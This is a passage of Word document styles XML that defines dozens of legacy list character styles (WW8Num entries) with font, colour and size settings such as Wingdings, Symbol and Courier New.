      <w:rFonts w:ascii="Wingdings" w:hAnsi="Wingdings"/>
    </w:rPr>
  </w:style>
  <w:style w:type="character" w:customStyle="1" w:styleId="WW8Num11z1">
    <w:name w:val="WW8Num11z1"/>
    <w:rsid w:val="00895A44"/>
    <w:rPr>
      <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
      <w:color w:val="auto"/>
    </w:rPr>
  </w:style>
  <w:style w:type="character" w:customStyle="1" w:styleId="WW8Num16z3">
    <w:name w:val="WW8Num16z3"/>
    <w:rsid w:val="00895A44"/>
    <w:rPr>
      <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
    </w:rPr>
  </w:style>
  <w:style w:type="character" w:customStyle="1" w:styleId="WW8Num18z0">
    <w:name w:val="WW8Num18z0"/>
    <w:rsid w:val="00895A44"/>
    <w:rPr>
      <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
      <w:color w:val="auto"/>
    </w:rPr>
  </w:style>
  <w:style w:type="character" w:customStyle="1" w:styleId="WW8Num18z1">
    <w:name w:val="WW8Num18z1"/>
    <w:rsid w:val="00895A44"/>
    <w:rPr>
      <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
    </w:rPr>
  </w:style>
  <w:style w:type="character" w:customStyle="1" w:styleId="WW8Num18z3">
    <w:name w:val="WW8Num18z3"/>
    <w:rsid w:val="00895A44"/>
    <w:rPr>
      <w:rFonts w:ascii="Symbol" w:hAnsi="Symbol"/>
    </w:rPr>
  </w:style>
  <w:style w:type="character" w:customStyle="1" w:styleId="WW8Num18z5">
    <w:name w:val="WW8Num18z5"/>
    <w:rsid w:val="00895A44"/>
    <w:rPr>
      <w:rFonts w:ascii="Wingdings" w:hAnsi="Wingdings"/>
    </w:rPr>
  </w:style>
  <w:style w:type="character" w:customStyle="1" w:styleId="WW8Num22z0">
    <w:name w:val="WW8Num22z0"/>
    <w:rsid w:val="00895A44"/>
    <w:rPr>
      <w:rFonts w:ascii="Symbol" w:hAnsi="Symbol"/>
      <w:sz w:val="20"/>
    </w:rPr>
  </w:style>
  <w:style w:type="character" w:customStyle="1" w:styleId="WW8Num22z1">
    <w:name w:val="WW8Num22z1"/>
    <w:rsid w:val="00895A44"/>
    <w:rPr>
      <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
      <w:sz w:val="20"/>
    </w:rPr>
  </w:style>
  <w:style w:type="character" w:customStyle="1" w:styleId="WW8Num22z2">
    <w:name w:val="WW8Num22z2"/>
    <w:rsid w:val="00895A44"/>
    <w:rPr>
      <w:rFonts w:ascii="Wingdings" w:hAnsi="Wingdings"/>
    </w:rPr>
  </w:style>
  <w:style w:type="character" w:customStyle="1" w:styleId="WW8Num22z3">
    <w:name w:val="WW8Num22z3"/>
    <w:rsid w:val="00895A44"/>
    <w:rPr>
      <w:rFonts w:ascii="Symbol" w:hAnsi="Symbol"/>
    </w:rPr>
  </w:style>
  <w:style w:type="character" w:customStyle="1" w:styleId="WW8Num22z4">
    <w:name w:val="WW8Num22z4"/>
    <w:rsid w:val="00895A44"/>
    <w:rPr>
      <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
    </w:rPr>
  </w:style>
  <w:style w:type="character" w:customStyle="1" w:styleId="WW8Num23z0">
    <w:name w:val="WW8Num23z0"/>
    <w:rsid w:val="00895A44"/>
    <w:rPr>
      <w:rFonts w:ascii="Wingdings" w:hAnsi="Wingdings"/>
    </w:rPr>
  </w:style>
  <w:style w:type="character" w:customStyle="1" w:styleId="WW8Num23z2">
    <w:name w:val="WW8Num23z2"/>
    <w:rsid w:val="00895A44"/>
    <w:rPr>
      <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
    </w:rPr>
  </w:style>
  <w:style w:type="character" w:customStyle="1" w:styleId="WW8Num28z0">
    <w:name w:val="WW8Num28z0"/>
    <w:rsid w:val="00895A44"/>
    <w:rPr>
      <w:rFonts w:ascii="Wingdings" w:hAnsi="Wingdings"/>
    </w:rPr>
  </w:style>
  <w:style w:type="character" w:customStyle="1" w:styleId="WW8Num30z3">
    <w:name w:val="WW8Num30z3"/>
    <w:rsid w:val="00895A44"/>
    <w:rPr>
      <w:rFonts w:ascii="Symbol" w:hAnsi="Symbol"/>
    </w:rPr>
  </w:style>
  <w:style w:type="character" w:customStyle="1" w:styleId="WW8Num31z0">
    <w:name w:val="WW8Num31z0"/>
    <w:rsid w:val="00895A44"/>
    <w:rPr>
      <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
      <w:color w:val="auto"/>
    </w:rPr>
  </w:style>
  <w:style w:type="character" w:customStyle="1" w:styleId="WW8Num31z1">
    <w:name w:val="WW8Num31z1"/>
    <w:rsid w:val="00895A44"/>
    <w:rPr>
      <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
    </w:rPr>
  </w:style>
  <w:style w:type="character" w:customStyle="1" w:styleId="WW8Num31z2">
    <w:name w:val="WW8Num31z2"/>
    <w:rsid w:val="00895A44"/>
    <w:rPr>
      <w:rFonts w:ascii="Wingdings" w:hAnsi="Wingdings"/>
      <w:color w:val="auto"/>
    </w:rPr>
  </w:style>
  <w:style w:type="character" w:customStyle="1" w:styleId="WW8Num31z3">
    <w:name w:val="WW8Num31z3"/>
    <w:rsid w:val="00895A44"/>
    <w:rPr>
      <w:rFonts w:ascii="Symbol" w:hAnsi="Symbol"/>
    </w:rPr>
  </w:style>
  <w:style w:type="character" w:customStyle="1" w:styleId="WW8Num31z5">
    <w:name w:val="WW8Num31z5"/>
    <w:rsid w:val="00895A44"/>
    <w:rPr>
      <w:rFonts w:ascii="Wingdings" w:hAnsi="Wingdings"/>
    </w:rPr>
  </w:style>
  <w:style w:type="character" w:customStyle="1" w:styleId="WW8Num33z1">
    <w:name w:val="WW8Num33z1"/>
    <w:rsid w:val="00895A44"/>
    <w:rPr>
      <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
      <w:color w:val="auto"/>
    </w:rPr>
  </w:style>
  <w:style w:type="character" w:customStyle="1" w:styleId="WW8Num34z0">
    <w:name w:val="WW8Num34z0"/>
    <w:rsid w:val="00895A44"/>
    <w:rPr>
      <w:rFonts w:ascii="Symbol" w:hAnsi="Symbol"/>
      <w:sz w:val="20"/>
    </w:rPr>
  </w:style>
  <w:style w:type="character" w:customStyle="1" w:styleId="WW8Num35z3">
    <w:name w:val="WW8Num35z3"/>
    <w:rsid w:val="00895A44"/>
    <w:rPr>
      <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
    </w:rPr>
  </w:style>
  <w:style w:type="character" w:customStyle="1" w:styleId="WW8Num38z3">
    <w:name w:val="WW8Num38z3"/>
    <w:rsid w:val="00895A44"/>
    <w:rPr>
      <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
    </w:rPr>
  </w:style>
  <w:style w:type="character" w:customStyle="1" w:styleId="WW8Num39z0">
    <w:name w:val="WW8Num39z0"/>
    <w:rsid w:val="00895A44"/>
    <w:rPr>
      <w:rFonts w:ascii="Wingdings" w:hAnsi="Wingdings"/>
    </w:rPr>
  </w:style>
  <w:style w:type="character" w:customStyle="1" w:styleId="WW8Num39z2">
    <w:name w:val="WW8Num39z2"/>
    <w:rsid w:val="00895A44"/>
    <w:rPr>
      <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
    </w:rPr>
  </w:style>
  <w:style w:type="character" w:customStyle="1" w:styleId="WW8Num40z0">
    <w:name w:val="WW8Num40z0"/>
    <w:rsid w:val="00895A44"/>
    <w:rPr>
      <w:rFonts w:ascii="Wingdings" w:hAnsi="Wingdings"/>
    </w:rPr>
  </w:style>
  <w:style w:type="character" w:customStyle="1" w:styleId="WW8Num40z1">
    <w:name w:val="WW8Num40z1"/>
    <w:rsid w:val="00895A44"/>
    <w:rPr>
      <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
    </w:rPr>
  </w:style>
  <w:style w:type="character" w:customStyle="1" w:styleId="WW8Num40z2">
    <w:name w:val="WW8Num40z2"/>
    <w:rsid w:val="00895A44"/>
    <w:rPr>
      <w:rFonts w:ascii="Symbol" w:hAnsi="Symbol"/>
      <w:color w:val="auto"/>
      <w:sz w:val="20"/>
    </w:rPr>
  </w:style>
  <w:style w:type="character" w:customStyle="1" w:styleId="WW8Num40z3">
    <w:name w:val="WW8Num40z3"/>
    <w:rsid w:val="00895A44"/>
    <w:rPr>
      <w:rFonts w:ascii="Symbol" w:hAnsi="Symbol"/>
    </w:rPr>
  </w:style>
  <w:style w:type="character" w:customStyle="1" w:styleId="WW8Num40z5">
    <w:name w:val="WW8Num40z5"/>
    <w:rsid w:val="00895A44"/>
    <w:rPr>
      <w:rFonts w:ascii="Wingdings" w:hAnsi="Wingdings"/>
    </w:rPr>
  </w:style>
  <w:style w:type="character" w:customStyle="1" w:styleId="WW8Num49z3">
    <w:name w:val="WW8Num49z3"/>
    <w:rsid w:val="00895A44"/>
    <w:rPr>
      <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
    </w:rPr>
  </w:style>
  <w:style w:type="character" w:customStyle="1" w:styleId="WW8Num50z3">
    <w:name w:val="WW8Num50z3"/>
    <w:rsid w:val="00895A44"/>
    <w:rPr>
      <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
    </w:rPr>
  </w:style>
  <w:style w:type="character" w:customStyle="1" w:styleId="WW8Num51z0">
    <w:name w:val="WW8Num51z0"/>
    <w:rsid w:val="00895A44"/>
    <w:rPr>
      <w:rFonts w:ascii="Symbol" w:hAnsi="Symbol"/>
      <w:sz w:val="20"/>
    </w:rPr>
  </w:style>
  <w:style w:type="character" w:customStyle="1" w:styleId="WW8Num54z0">
    <w:name w:val="WW8Num54z0"/>
    <w:rsid w:val="00895A44"/>
    <w:rPr>
      <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
      <w:color w:val="auto"/>
    </w:rPr>
  </w:style>
  <w:style w:type="character" w:customStyle="1" w:styleId="WW8Num54z1">
    <w:name w:val="WW8Num54z1"/>
    <w:rsid w:val="00895A44"/>
    <w:rPr>
      <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
    </w:rPr>
  </w:style>
  <w:style w:type="character" w:customStyle="1" w:styleId="WW8Num54z3">
    <w:name w:val="WW8Num54z3"/>
    <w:rsid w:val="00895A44"/>
    <w:rPr>
      <w:rFonts w:ascii="Symbol" w:hAnsi="Symbol"/>
    </w:rPr>
  </w:style>
  <w:style w:type="character" w:customStyle="1" w:styleId="WW8Num54z5">
    <w:name w:val="WW8Num54z5"/>
    <w:rsid w:val="00895A44"/>
    <w:rPr>
      <w:rFonts w:ascii="Wingdings" w:hAnsi="Wingdings"/>
    </w:rPr>
  </w:style>
  <w:style w:type="character" w:customStyle="1" w:styleId="WW8Num58z1">
    <w:name w:val="WW8Num58z1"/>
    <w:rsid w:val="00895A44"/>
    <w:rPr>
      <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
    </w:rPr>
  </w:style>
  <w:style w:type="character" w:customStyle="1" w:styleId="WW8Num59z1">
    <w:name w:val="WW8Num59z1"/>
    <w:rsid w:val="00895A44"/>
    <w:rPr>
      <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
      <w:color w:val="auto"/>
    </w:rPr>
  </w:style>
  <w:style w:type="character" w:customStyle="1" w:styleId="WW8Num61z0">
    <w:name w:val="WW8Num61z0"/>
    <w:rsid w:val="00895A44"/>
    <w:rPr>
      <w:rFonts w:ascii="Wingdings" w:hAnsi="Wingdings"/>
    </w:rPr>
  </w:style>
  <w:style w:type="character" w:customStyle="1" w:styleId="WW8Num61z1">
    <w:name w:val="WW8Num61z1"/>
    <w:rsid w:val="00895A44"/>
    <w:rPr>
      <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
    </w:rPr>
  </w:style>
  <w:style w:type="character" w:customStyle="1" w:styleId="WW8Num61z2">
    <w:name w:val="WW8Num61z2"/>
    <w:rsid w:val="00895A44"/>
    <w:rPr>
      <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
      <w:color w:val="auto"/>
    </w:rPr>
  </w:style>
  <w:style w:type="character" w:customStyle="1" w:styleId="WW8Num61z3">
    <w:name w:val="WW8Num61z3"/>
    <w:rsid w:val="00895A44"/>
    <w:rPr>
      <w:rFonts w:ascii="Symbol" w:hAnsi="Symbol"/>
    </w:rPr>
  </w:style>
  <w:style w:type="character" w:customStyle="1" w:styleId="WW8Num64z0">
    <w:name w:val="WW8Num64z0"/>
    <w:rsid w:val="00895A44"/>
    <w:rPr>
      <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
    </w:rPr>
  </w:style>
  <w:style w:type="character" w:customStyle="1" w:styleId="WW8Num65z1">
    <w:name w:val="WW8Num65z1"/>
    <w:rsid w:val="00895A44"/>
    <w:rPr>
      <w:rFonts w:ascii="Wingdings" w:hAnsi="Wingdings"/>
    </w:rPr>
  </w:style>
  <w:style w:type="character" w:customStyle="1" w:styleId="WW8Num67z0">
    <w:name w:val="WW8Num67z0"/>
    <w:rsid w:val="00895A44"/>
    <w:rPr>
      <w:rFonts w:ascii="Symbol" w:hAnsi="Symbol"/>
      <w:sz w:val="20"/>
    </w:rPr>
  </w:style>
  <w:style w:type="character" w:customStyle="1" w:styleId="WW8Num67z1">
    <w:name w:val="WW8Num67z1"/>
    <w:rsid w:val="00895A44"/>
    <w:rPr>
      <w:sz w:val="20"/>
    </w:rPr>
  </w:style>
  <w:style w:type="character" w:customStyle="1" w:styleId="WW8Num67z2">
    <w:name w:val="WW8Num67z2"/>
    <w:rsid w:val="00895A44"/>
    <w:rPr>
      <w:rFonts w:ascii="Wingdings" w:hAnsi="Wingdings"/>
    </w:rPr>
  </w:style>
  <w:style w:type="character" w:customStyle="1" w:styleId="WW8Num67z3">
    <w:name w:val="WW8Num67z3"/>
    <w:rsid w:val="00895A44"/>
    <w:rPr>
      <w:rFonts w:ascii="Symbol" w:hAnsi="Symbol"/>
    </w:rPr>
  </w:style>
  <w:style w:type="character" w:customStyle="1" w:styleId="WW8Num67z4">
    <w:name w:val="WW8Num67z4"/>
    <w:rsid w:val="00895A44"/>
    <w:rPr>
      <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
    </w:rPr>
  </w:style>
  <w:style w:type="character" w:customStyle="1" w:styleId="WW8Num68z1">
    <w:name w:val="WW8Num68z1"/>
    <w:rsid w:val="00895A44"/>
    <w:rPr>
      <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
      <w:color w:val="auto"/>
    </w:rPr>
  </w:style>
  <w:style w:type="character" w:customStyle="1" w:styleId="WW8Num69z0">
    <w:name w:val="WW8Num69z0"/>
    <w:rsid w:val="00895A44"/>
    <w:rPr>
      <w:rFonts w:ascii="Wingdings" w:hAnsi="Wingdings"/>
    </w:rPr>
  </w:style>
  <w:style w:type="character" w:customStyle="1" w:styleId="WW8Num69z1">
    <w:name w:val="WW8Num69z1"/>
    <w:rsid w:val="00895A44"/>
    <w:rPr>
      <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
    </w:rPr>
  </w:style>
  <w:style w:type="character" w:customStyle="1" w:styleId="WW8Num69z3">
    <w:name w:val="WW8Num69z3"/>
    <w:rsid w:val="00895A44"/>
    <w:rPr>
      <w:rFonts w:ascii="Symbol" w:hAnsi="Symbol"/>
    </w:rPr>
  </w:style>
  <w:style w:type="character" w:customStyle="1" w:styleId="WW8Num71z1">
    <w:name w:val="WW8Num71z1"/>
    <w:rsid w:val="00895A44"/>
    <w:rPr>
      <w:rFonts w:ascii="Symbol" w:hAnsi="Symbol"/>
      <w:sz w:val="20"/>
    </w:rPr>
  </w:style>
  <w:style w:type="character" w:customStyle="1" w:styleId="WW8Num72z0">
    <w:name w:val="WW8Num72z0"/>
    <w:rsid w:val="00895A44"/>
    <w:rPr>
      <w:rFonts w:ascii="Symbol" w:hAnsi="Symbol"/>
    </w:rPr>
  </w:style>
  <w:style w:type="character" w:customStyle="1" w:styleId="WW8Num72z1">
    <w:name w:val="WW8Num72z1"/>
    <w:rsid w:val="00895A44"/>
    <w:rPr>
      <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
      <w:sz w:val="20"/>
    </w:rPr>
  </w:style>
  <w:style w:type="character" w:customStyle="1" w:styleId="WW8Num72z2">
    <w:name w:val="WW8Num72z2"/>
    <w:rsid w:val="00895A44"/>
    <w:rPr>
      <w:rFonts w:ascii="Wingdings" w:hAnsi="Wingdings"/>
    </w:rPr>
  </w:style>
  <w:style w:type="character" w:customStyle="1" w:styleId="WW8Num72z3">
    <w:name w:val="WW8Num72z3"/>
    <w:rsid w:val="00895A44"/>
    <w:rPr>
      <w:rFonts w:ascii="Wingdings" w:hAnsi="Wingdings"/>
      <w:sz w:val="20"/>
    </w:rPr>
  </w:style>
  <w:style w:type="character" w:customStyle="1" w:styleId="WW8Num72z4">
    <w:name w:val="WW8Num72z4"/>
    <w:rsid w:val="00895A44"/>
    <w:rPr>
      <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
      <w:color w:val="auto"/>
    </w:rPr>
  </w:style>
  <w:style w:type="character" w:customStyle="1" w:styleId="WW8Num72z7">
    <w:name w:val="WW8Num72z7"/>
    <w:rsid w:val="00895A44"/>
    <w:rPr>
      <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
    </w:rPr>
  </w:style>
  <w:style w:type="character" w:customStyle="1" w:styleId="WW8Num73z0">
    <w:name w:val="WW8Num73z0"/>
    <w:rsid w:val="00895A44"/>
    <w:rPr>
      <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New"/>
      <w:color w:val="auto"/>
    </w:rPr>
  </w:style>
  <w:style w:type="character" w:customStyle="1" w:styleId="WW8Num73z1">
    <w:name w:val="WW8Num73z1"/>
    <w:rsid w:val="00895A44"/>
    <w:rPr>
      <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
    </w:rPr>
  </w:style>
  <w:style w:type="character" w:customStyle="1" w:styleId="WW8Num73z2">
    <w:name w:val="WW8Num73z2"/>
    <w:rsid w:val="00895A44"/>
    <w:rPr>
      <w:rFonts w:ascii="Wingdings" w:hAnsi="Wingdings"/>
    </w:rPr>
  </w:style>
  <w:style w:type="character" w:customStyle="1" w:styleId="WW8Num73z3">
    <w:name w:val="WW8Num73z3"/>
    <w:rsid w:val="00895A44"/>
    <w:rPr>
      <w:rFonts w:ascii="Symbol" w:hAnsi="Symbol"/>
    </w:rPr>
  </w:style>
  <w:style w:type="character" w:customStyle="1" w:styleId="WW8Num74z0">
    <w:name w:val="WW8Num74z0"/>
    <w:rsid w:val="00895A44"/>
    <w:rPr>
      <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
    </w:rPr>
  </w:style>
  <w:style w:type="character" w:customStyle="1" w:styleId="WW8Num74z1">
    <w:name w:val="WW8Num74z1"/>
    <w:rsid w:val="00895A44"/>
    <w:rPr>
      <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
    </w:rPr>
  </w:style>
  <w:style w:type="character" w:customStyle="1" w:styleId="WW8Num74z2">
    <w:name w:val="WW8Num74z2"/>
    <w:rsid w:val="00895A44"/>
    <w:rPr>
      <w:rFonts w:ascii="Wingdings" w:hAnsi="Wingdings"/>
    </w:rPr>
  </w:style>
  <w:style w:type="character" w:customStyle="1" w:styleId="WW8Num74z3">
    <w:name w:val="WW8Num74z3"/>
    <w:rsid w:val="00895A44"/>
    <w:rPr>
      <w:rFonts w:ascii="Symbol" w:hAnsi="Symbol"/>
    </w:rPr>
  </w:style>
  <w:style w:type="character" w:customStyle="1" w:styleId="WW8Num75z0">
    <w:name w:val="WW8Num75z0"/>
    <w:rsid w:val="00895A44"/>
    <w:rPr>
      <w:rFonts w:ascii="Wingdings" w:hAnsi="Wingdings"/>
    </w:rPr>
  </w:style>
  <w:style w:type="character" w:customStyle="1" w:styleId="WW8Num75z1">
    <w:name w:val="WW8Num75z1"/>
    <w:rsid w:val="00895A44"/>
    <w:rPr>
      <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
    </w:rPr>
  </w:style>
  <w:style w:type="character" w:customStyle="1" w:styleId="WW8Num75z3">
    <w:name w:val="WW8Num75z3"/>
    <w:rsid w:val="00895A44"/>
    <w:rPr>
      <w:rFonts w:ascii="Symbol" w:hAnsi="Symbol"/>
    </w:rPr>
  </w:style>
  <w:style w:type="character" w:customStyle="1" w:styleId="WW8Num76z0">
    <w:name w:val="WW8Num76z0"/>
    <w:rsid w:val="00895A44"/>
    <w:rPr>
      <w:rFonts w:ascii="Wingdings" w:hAnsi="Wingdings"/>
    </w:rPr>
  </w:style>
  <w:style w:type="character" w:customStyle="1" w:styleId="WW8Num76z1">
    <w:name w:val="WW8Num76z1"/>
    <w:rsid w:val="00895A44"/>
    <w:rPr>
      <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
      <w:color w:val="auto"/>
    </w:rPr>
  </w:style>
  <w:style w:type="character" w:customStyle="1" w:styleId="WW8Num76z3">
    <w:name w:val="WW8Num76z3"/>
    <w:rsid w:val="00895A44"/>
    <w:rPr>
      <w:rFonts w:ascii="Symbol" w:hAnsi="Symbol"/>
    </w:rPr>
  </w:style>
  <w:style w:type="character" w:customStyle="1" w:styleId="WW8Num77z0">
    <w:name w:val="WW8Num77z0"/>
    <w:rsid w:val="00895A44"/>
    <w:rPr>
      <w:rFonts w:ascii="Wingdings" w:hAnsi="Wingdings"/>
    </w:rPr>
  </w:style>
  <w:style w:type="character" w:customStyle="1" w:styleId="WW8Num77z1">
    <w:name w:val="WW8Num77z1"/>
    <w:rsid w:val="00895A44"/>
    <w:rPr>
      <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
    </w:rPr>
  </w:style>
  <w:style w:type="character" w:customStyle="1" w:styleId="WW8Num77z3">
    <w:name w:val="WW8Num77z3"/>
    <w:rsid w:val="00895A44"/>
    <w:rPr>
      <w:rFonts w:ascii="Symbol" w:hAnsi="Symbol"/>
    </w:rPr>
  </w:style>
  <w:style w:type="character" w:customStyle="1" w:styleId="WW8Num79z1">
    <w:name w:val="WW8Num79z1"/>
    <w:rsid w:val="00895A44"/>
    <w:rPr>
      <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
      <w:color w:val="auto"/>
    </w:rPr>
  </w:style>
  <w:style w:type="character" w:customStyle="1" w:styleId="WW8Num79z2">
    <w:name w:val="WW8Num79z2"/>
    <w:rsid w:val="00895A44"/>
    <w:rPr>
      <w:rFonts w:ascii="Wingdings" w:hAnsi="Wingdings"/>
    </w:rPr>
  </w:style>
  <w:style w:type="character" w:customStyle="1" w:styleId="WW8Num80z0">
    <w:name w:val="WW8Num80z0"/>
    <w:rsid w:val="00895A44"/>
    <w:rPr>
      <w:rFonts w:ascii="Wingdings" w:hAnsi="Wingdings"/>
    </w:rPr>
  </w:style>
  <w:style w:type="character" w:customStyle="1" w:styleId="WW8Num80z1">
    <w:name w:val="WW8Num80z1"/>
    <w:rsid w:val="00895A44"/>
    <w:rPr>
      <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
    </w:rPr>
  </w:style>
  <w:style w:type="character" w:customStyle="1" w:styleId="WW8Num80z3">
    <w:name w:val="WW8Num80z3"/>
    <w:rsid w:val="00895A44"/>
    <w:rPr>
      <w:rFonts w:ascii="Symbol" w:hAnsi="Symbol"/>
    </w:rPr>
  </w:style>
  <w:style w:type="character" w:customStyle="1" w:styleId="WW8Num82z0">
    <w:name w:val="WW8Num82z0"/>
    <w:rsid w:val="00895A44"/>
    <w:rPr>
      <w:rFonts w:ascii="Wingdings" w:hAnsi="Wingdings"/>
    </w:rPr>
  </w:style>
  <w:style w:type="character" w:customStyle="1" w:styleId="WW8Num82z1">
    <w:name w:val="WW8Num82z1"/>
    <w:rsid w:val="00895A44"/>
    <w:rPr>
      <w:rFonts w:ascii="Wingdings" w:hAnsi="Wingdings"/>
    </w:rPr>
  </w:style>
  <w:style w:type="character" w:customStyle="1" w:styleId="WW8Num82z3">
    <w:name w:val="WW8Num82z3"/>
    <w:rsid w:val="00895A44"/>
    <w:rPr>
      <w:rFonts w:ascii="Symbol" w:hAnsi="Symbol"/>
    </w:rPr>
  </w:style>
  <w:style w:type="character" w:customStyle="1" w:styleId="WW8Num83z0">
    <w:name w:val="WW8Num83z0"/>
    <w:rsid w:val="00895A44"/>
    <w:rPr>
      <w:rFonts w:ascii="Wingdings" w:hAnsi="Wingdings"/>
      <w:color w:val="auto"/>
    </w:rPr>
  </w:style>
  <w:style w:type="character" w:customStyle="1" w:styleId="WW8Num83z1">
    <w:name w:val="WW8Num83z1"/>
    <w:rsid w:val="00895A44"/>
    <w:rPr>
      <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
    </w:rPr>
  </w:style>
  <w:style w:type="character" w:customStyle="1" w:styleId="WW8Num83z2">
    <w:name w:val="WW8Num83z2"/>
    <w:rsid w:val="00895A44"/>
    <w:rPr>
      <w:rFonts w:ascii="Wingdings" w:hAnsi="Wingdings"/>
    </w:rPr>
  </w:style>
  <w:style w:type="character" w:customStyle="1" w:styleId="WW8Num83z3">
    <w:name w:val="WW8Num83z3"/>
    <w:rsid w:val="00895A44"/>
    <w:rPr>
      <w:rFonts w:ascii="Symbol" w:hAnsi="Symbol"/>
    </w:rPr>
  </w:style>
  <w:style w:type="character" w:customStyle="1" w:styleId="WW8Num84z0">
    <w:name w:val="WW8Num84z0"/>
    <w:rsid w:val="00895A44"/>
    <w:rPr>
      <w:rFonts w:ascii="Symbol" w:hAnsi="Symbol"/>
      <w:sz w:val="20"/>
    </w:rPr>
  </w:style>
  <w:style w:type="character" w:customStyle="1" w:styleId="WW8Num84z1">
    <w:name w:val="WW8Num84z1"/>
    <w:rsid w:val="00895A44"/>
    <w:rPr>
      <w:sz w:val="20"/>
    </w:rPr>
  </w:style>
  <w:style w:type="character" w:customStyle="1" w:styleId="WW8Num84z3">
    <w:name w:val="WW8Num84z3"/>
    <w:rsid w:val="00895A44"/>
    <w:rPr>
      <w:rFonts w:ascii="Symbol" w:hAnsi="Symbol"/>
    </w:rPr>
  </w:style>
  <w:style w:type="character" w:customStyle="1" w:styleId="WW8Num84z4">
    <w:name w:val="WW8Num84z4"/>
    <w:rsid w:val="00895A44"/>
    <w:rPr>
      <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
    </w:rPr>
  </w:style>
  <w:style w:type="character" w:customStyle="1" w:styleId="WW8Num85z0">
    <w:name w:val="WW8Num85z0"/>
    <w:rsid w:val="00895A44"/>
    <w:rPr>
      <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
      <w:color w:val="auto"/>
    </w:rPr>
  </w:style>
  <w:style w:type="character" w:customStyle="1" w:styleId="WW8Num85z1">
    <w:name w:val="WW8Num85z1"/>
    <w:rsid w:val="00895A44"/>
    <w:rPr>
      <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
    </w:rPr>
  </w:style>
  <w:style w:type="character" w:customStyle="1" w:styleId="WW8Num85z2">
    <w:name w:val="WW8Num85z2"/>
    <w:rsid w:val="00895A44"/>
    <w:rPr>
      <w:rFonts w:ascii="Wingdings" w:hAnsi="Wingdings"/>
    </w:rPr>
  </w:style>
  <w:style w:type="character" w:customStyle="1" w:styleId="WW8Num85z3">
    <w:name w:val="WW8Num85z3"/>
    <w:rsid w:val="00895A44"/>
    <w:rPr>
      <w:rFonts w:ascii="Symbol" w:hAnsi="Symbol"/>
    </w:rPr>
  </w:style>
  <w:style w:type="character" w:customStyle="1" w:styleId="WW8Num88z0">
    <w:name w:val="WW8Num88z0"/>
    <w:rsid w:val="00895A44"/>
    <w:rPr>
      <w:rFonts w:ascii="Wingdings" w:hAnsi="Wingdings"/>
    </w:rPr>
  </w:style>
  <w:style w:type="character" w:customStyle="1" w:styleId="WW8Num88z1">
    <w:name w:val="WW8Num88z1"/>
    <w:rsid w:val="00895A44"/>
    <w:rPr>
      <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
    </w:rPr>
  </w:style>
  <w:style w:type="character" w:customStyle="1" w:styleId="WW8Num88z3">
    <w:name w:val="WW8Num88z3"/>
    <w:rsid w:val="00895A44"/>
    <w:rPr>
      <w:rFonts w:ascii="Symbol" w:hAnsi="Symbol"/>
    </w:rPr>
  </w:style>
  <w:style w:type="character" w:customStyle="1" w:styleId="WW8Num89z0">
    <w:name w:val="WW8Num89z0"/>
    <w:rsid w:val="00895A44"/>
    <w:rPr>
